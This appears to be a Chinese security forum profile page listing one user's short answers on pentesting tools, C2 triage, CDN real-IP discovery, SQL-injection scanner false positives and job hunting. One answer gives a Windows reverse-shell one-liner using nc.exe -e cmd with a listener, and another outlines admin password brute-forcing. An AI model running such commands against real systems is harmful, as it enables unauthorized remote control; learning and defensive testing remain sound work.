Colorado
Colorado

性别: 注册于 2021-07-16

安全小白

向TA求助
285金币数
614 经验值
7个粉丝
主页被访问 12732 次

61 个回答

0 赞同

一台终端发现外联恶意C2,上机排查无任何发现,是啥原因

事件分析或者日志那里看看,再者查看进程信息、网络连接状态,排查是否存在异常

回答于 2021-12-14 12:08

0 赞同

网站后台密码暴力破解如何发现并利用?

查看是否是cms搭建的或者是使用了框架,然后对测试用户名是否可以找到已创建的用户名,如果找到了真实的用户名,那么可以寻找密码字典进行爆破

回答于 2021-12-02 22:23

0 赞同

windows环境反弹shell是如何操作的?

最简单的一种就是,一端监听,一端发起,从而建立数据通信,nc.exe -e cmd ip 端口   。  nc -lvvp 端口

回答于 2021-12-02 17:27

0 赞同

burp启动报错

尽量用java8或者是用集成的exe的burp,这样更方便

回答于 2021-12-02 17:25

0 赞同

nc无法使用

换端口,尽量用大点的,例如5566、6666等,如果还不行可以回复我帮你解答

回答于 2021-12-02 17:23

0 赞同

各位师傅们 开了cdn 有什么灵性的方法找到真实ip

dns查询,超级ping,功能点点击,搜索引擎查找,

回答于 2021-11-12 16:44

0 赞同

burp抓包到底是抓的流量包还是本地包,为什么有人说是本地包,有...

流量包,相当于是你客户端访问服务器,然后之间的数据被抓取。burp是抓取的方式让你看到之间是怎么交互的

回答于 2021-11-12 16:42

0 赞同

合肥求职

合肥很少听到,要么区招聘网找,要么就是看看有没有大厂在那边

回答于 2021-11-12 16:40

0 赞同

面对一些新型的开发语言和框架(Go,nodejs,python等)有什么好...

找历史的漏洞,如果没有,就去下载相对应版本的源码下来审计,因为不是nday就是审计,或者是有其他功能点会出现漏洞可以利用

回答于 2021-11-12 16:39

1 赞同

关于awvs的sql注入

awvs测试出来的注入,误报率很高,我个人使用的情况就是基本都是错误的,然后手工验证的时候不出来,分析以下payload就知道是不是误报了,而不是awvs有payload那就是真的注入,不一定的事,你这个建议自己用sqlmap跑看看,或者手工

回答于 2021-11-12 16:37